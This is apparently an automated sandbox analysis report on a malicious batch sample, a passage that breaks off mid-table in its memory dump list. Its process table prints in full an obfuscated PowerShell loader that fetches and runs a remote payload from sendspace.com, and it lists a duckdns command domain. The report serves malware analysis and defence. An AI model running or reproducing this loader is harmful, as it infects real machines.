Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
las.cmd
|
ASCII text, with very long lines (6553), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyvypyxf.wnr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqrzrx5e.ebr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kexi2ema.soo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfzb1fft.ftf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M8Q5QGCJABF090V2TYR5.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Preaffirmative.Spo
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function
Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke(
$velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens
' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes
Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt
Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0
yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens
' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/
Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf
lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens
'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp
Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit
Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl
Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf
jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU
udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts
Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A
ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem
BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t
rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223
($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren.
D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$
ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu
os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$
UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223
(Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn
uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo
UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL
nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223
(Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens
'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp
lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil,
') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg
CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek
S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc
Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223
(Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe
KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223
(Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar
Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr
S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth
');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn
RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE
CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt
krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223
(Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases
SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb
GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen
yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function
Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke(
$velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens
' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes
Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt
Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0
yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens
' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/
Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf
lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens
'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp
Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit
Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl
Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf
jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU
udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts
Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A
ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem
BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t
rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223
($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren.
D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$
ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu
os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$
UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223
(Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn
uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo
UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL
nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223
(Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens
'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp
lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil,
') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg
CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek
S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc
Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223
(Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe
KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223
(Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar
Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr
S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth
');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn
RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE
CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt
krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223
(Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases
SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb
GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen
yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7yi2fu
|
172.67.170.105
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs03n3.sendspace.com/2
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin
|
69.31.136.17
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7yi2fuXR
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
https://fs03n4.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7yi2fuP
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/lt00vw5
|
unknown
|
||
|
https://fs03n3.sendspace.com/
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/lt00vw
|
172.67.170.105
|
||
|
https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea
|
69.31.136.17
|
||
|
http://fs03n4.sendspace.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://fs03n4.sendspace.comX
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://fs03n4.sendspaX
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://fs03n3.sendspace.com/om:443
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xvern429.duckdns.org
|
12.202.180.134
|
|
|
|
198.187.3.20.in-addr.arpa
|
unknown
|
|
|
|
fs03n4.sendspace.com
|
69.31.136.17
|
||
|
fs03n3.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
172.67.170.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
xvern429.duckdns.org
|
United States
|
|
|
|
69.31.136.17
|
fs03n4.sendspace.com
|
United States
|
||
|
172.67.170.105
|
www.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5E95000
|
trusted library allocation
|
page read and write
|
|
|
|
27AE9843000
|
trusted library allocation
|
page read and write
|
|
|
|
86D0000
|
direct allocation
|
page execute and read and write
|
|
|
|
923E000
|
direct allocation
|
page execute and read and write
|
|
|
|
7F8C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27AD9C54000
|
trusted library allocation
|
page read and write
|
||
|
538E000
|
stack
|
page read and write
|
||
|
20550000
|
direct allocation
|
page read and write
|
||
|
27AD9F59000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
534E000
|
stack
|
page read and write
|
||
|
547E000
|
heap
|
page read and write
|
||
|
2FDA000
|
heap
|
page read and write
|
||
|
2398E000
|
stack
|
page read and write
|
||
|
2F99000
|
heap
|
page read and write
|
||
|
FA36A7E000
|
stack
|
page read and write
|
||
|
2388E000
|
stack
|
page read and write
|
||
|
230A4000
|
trusted library allocation
|
page read and write
|
||
|
2DB0000
|
trusted library allocation
|
page read and write
|
||
|
27ADB5BE000
|
trusted library allocation
|
page read and write
|
||
|
20CC0000
|
direct allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
21051000
|
trusted library allocation
|
page read and write
|
||
|
5D29000
|
trusted library allocation
|
page read and write
|
||
|
8137000
|
stack
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
7473000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
87B0000
|
direct allocation
|
page read and write
|
||
|
2AC8000
|
stack
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
20DCE000
|
stack
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
27ADA082000
|
trusted library allocation
|
page read and write
|
||
|
4AAB000
|
stack
|
page read and write
|
||
|
23151000
|
heap
|
page read and write
|
||
|
53B0000
|
direct allocation
|
page read and write
|
||
|
2D80000
|
trusted library section
|
page read and write
|
||
|
21180000
|
trusted library allocation
|
page read and write
|
||
|
20FEA000
|
trusted library allocation
|
page read and write
|
||
|
210A7000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
4B10000
|
direct allocation
|
page read and write
|
||
|
258A9190000
|
heap
|
page read and write
|
||
|
27AE9ABD000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
20CE0000
|
trusted library allocation
|
page read and write
|
||
|
2118E000
|
trusted library allocation
|
page read and write
|
||
|
4BBD000
|
stack
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
5473000
|
heap
|
page read and write
|
||
|
57D0000
|
direct allocation
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
27AF1B6F000
|
heap
|
page read and write
|
||
|
230E0000
|
trusted library allocation
|
page read and write
|
||
|
57E7000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
21192000
|
trusted library allocation
|
page read and write
|
||
|
87A0000
|
direct allocation
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
20FA6000
|
trusted library allocation
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
6B549DD000
|
stack
|
page read and write
|
||
|
210D2000
|
trusted library allocation
|
page read and write
|
||
|
20560000
|
direct allocation
|
page read and write
|
||
|
489E000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
7DF490F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
2380D000
|
stack
|
page read and write
|
||
|
27AE97F1000
|
trusted library allocation
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
865E000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
827E000
|
heap
|
page read and write
|
||
|
21195000
|
trusted library allocation
|
page read and write
|
||
|
323F000
|
stack
|
page read and write
|
||
|
5437000
|
heap
|
page read and write
|
||
|
2DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
